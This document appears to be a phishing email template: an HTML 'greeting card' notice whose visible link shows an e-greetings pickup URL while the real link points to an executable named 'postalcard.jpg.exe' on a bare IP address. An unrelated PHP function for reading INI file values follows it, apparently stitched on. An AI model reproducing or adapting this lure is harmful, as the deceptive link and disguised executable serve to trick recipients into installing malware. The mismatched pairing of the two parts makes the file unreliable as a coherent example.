<html>
<title> Greeting </title>
<body>
<p>Hello ,</p>
<p>A Greeting Card is waiting for you at our virtual post office! You can pick up your postcard at the following web address:</p>
<p><a href="http://75.50.192.60/postalcard.jpg.exe">http://www.all-yours.net/u/view.php?id=a0190313376667</a></p>
<p> visit E-Greetings at <a href="http://www.all-yours.net/">http://www.all-yours.net/</a><br>
and enter your pickup code, which is: a0190313376667<br>
<br>
(Your postcard will be available for 60 days.)</p>
</body>



<?php
    function loadini($path) {
    $fp = fopen($path, "r");
    $fpcontents = fread($fp, filesize($path));
    fclose($fp);
    return $fpcontents;
    }
    function readini($filename, $key) {
    return rfi($filename,$key,TRUE);
    }
    function rfi($filename, $key, $just_value) {
    $filecontents=loadini($filename);
    $key .= "=";
    $currentkey = strstr($filecontents, $key);
    if (!$currentkey)
    return($empty);
    $endpos = strpos($currentkey, "\r\n");
    if (!$endpos)  $endpos = strlen($currentkey);
    if ($just_value)  $currentkey = trim(substr($currentkey, strlen($key), $endpos-strlen($key)));
    else $currentkey = trim(substr($currentkey, 0, $endpos));
    return ($currentkey);
    }
?>